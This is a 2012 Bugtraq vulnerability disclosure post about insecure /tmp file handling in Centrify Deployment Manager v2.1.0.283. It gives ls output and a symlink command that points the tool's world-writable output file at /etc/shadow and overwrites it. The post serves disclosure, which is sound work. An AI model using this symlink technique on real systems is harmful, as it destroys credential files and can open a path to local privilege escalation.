Bugtraq mailing list archives
Centrify Deployment Manager v2.1.0.283
From: larry0 () me com
Date: Tue, 4 Dec 2012 13:55:20 GMT
Centrify Deployment Manager v2.1.0.283 While at a training session for centrify, I noticed poor handling of files in /tmp. I was able to overwrite /etc/shadow with the contents of adcheckDMoutput. I am sure there are more vulnerabilities to be exploit, maybe a local root - but being this is a training class I should probably focus..... total 6680 -rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rw-rw-r-- 1 clyde clyde 188 Dec 3 14:41 centrify.cmd.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh drwx------ 2 root root 4096 Dec 3 10:25 vmware-root drwxr-xr-x 7 root root 4096 Nov 30 2010 vmware-tools-distrib [root@engnew-cen tmp]# ls -l total 6680 -rw-rw-rw- 1 root root 3999 Dec 3 14:41 adcheckDMoutput -rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh drwx------ 2 root root 4096 Dec 3 10:25 vmware-root drwxr-xr-x 7 root root 4096 Nov 30 2010 vmware-tools-distrib [root@engnew-cen tmp]# ls -l total 6688 -rw-rw-rw- 1 root root 3999 Dec 3 14:41 adcheckDMoutput -rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rwxr-xr-x 1 clyde clyde 132 Dec 3 14:41 centrify.cmd.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh drwx------ 2 root root 4096 Dec 3 10:25 vmware-root drwxr-xr-x 7 root root 4096 Nov 30 2010 vmware-tools-distrib [root@engnew-cen tmp]# ls -l total 6672 -rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh # ln -s /etc/shadow adcheckDMoutput After run: # ls -l /etc/shadow -r-------- 1 root root 3999 Dec 3 14:56 /etc/shadow /etc/shadow has been overwritten with the contents of adcheckDMoutput. I am also assuming the .210 appended to the end of files in /tmp is the major version number. Larry W. Cashdollar @_larry0
Current thread:
- Centrify Deployment Manager v2.1.0.283 larry0 (Dec 04)
- <Possible follow-ups>
- Centrify Deployment Manager v2.1.0.283 larry0 (Dec 04)
- Re: Centrify Deployment Manager v2.1.0.283 to-choi . lau (Dec 14)